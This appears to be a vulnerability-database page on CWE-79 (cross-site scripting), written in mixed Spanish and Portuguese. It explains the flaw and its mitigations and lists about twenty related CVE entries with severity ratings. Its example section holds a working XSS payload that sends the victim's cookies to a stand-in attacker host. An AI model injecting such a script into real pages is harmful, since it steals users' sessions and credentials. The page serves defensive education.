Fallos del tipo CWE-79

29.057 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-0394MEDIUMCross-site Scripting (XSS) - Stored in livehelperchat/livehelperchatEPSS 0.5%CVE-2023-3293HIGHCross-site Scripting (XSS) - Stored in salesagility/suitecrm-coreEPSS 0.5%CVE-2024-3525LOWCampcodes Online Event Management System index.php cross site scriptingEPSS 0.5%CVE-2021-24470—Yada Wiki < 3.4.1 - Contributor+ Stored XSSEPSS 0.5%CVE-2026-73648MEDIUMrails-html-sanitizer: Possible XSS vulnerability with certain configurationsEPSS 0.5%CVE-2019-25216HIGHRich Reviews <= 1.7.4 - Stored Cross-Site ScriptingEPSS 0.5%CVE-2026-54743MEDIUMLemmy: Stored XSS via markdown image alt-text in lemmy-ui html5-embedEPSS 0.5%CVE-2024-21637HIGHXSS in Authentik via JavaScript-URI as Redirect URI and form_post Response ModeEPSS 0.5%CVE-2026-55090MEDIUMEtherpad: Stored XSS in HTML export via unescaped attribute-pool valuesEPSS 0.5%CVE-2021-24428—RSS for Yandex Turbo <= 1.30 - Authenticated Stored XSSEPSS 0.5%CVE-2022-0350MEDIUMCross-site Scripting (XSS) - Stored in vanessa219/vditorEPSS 0.5%CVE-2026-92144HIGHForminator Forms <= 1.57.2 - Unauthenticated Stored Cross-Site Scripting via 'postdata-1[post-custom]' ParameterEPSS 0.5%CVE-2026-55850MEDIUMElement Web: A malicious homeserver can inject HTML in Element Web using its homepageEPSS 0.5%CVE-2024-36997MEDIUMPersistent Cross-site Scripting (XSS) in conf-web/settings REST endpointEPSS 0.5%CVE-2022-35226—SAP Data Services Management allows an attacker to copy the data from a request and echoed into the application's immediate response, it wilEPSS 0.5%CVE-2023-6103LOWIntelbras RX 1500 SSID WiFi.html cross site scriptingEPSS 0.5%CVE-2026-0534HIGHStored XSS in the value of a part attributeEPSS 0.5%CVE-2020-15119MEDIUMDOM-based XSS in auth0-lockEPSS 0.5%CVE-2014-125096LOWFancy Gallery Plugin Options Page class.options.php cross site scriptingEPSS 0.5%CVE-2022-39024MEDIUMe-Excellence Inc. U-Office Force - Reflected XSSEPSS 0.5%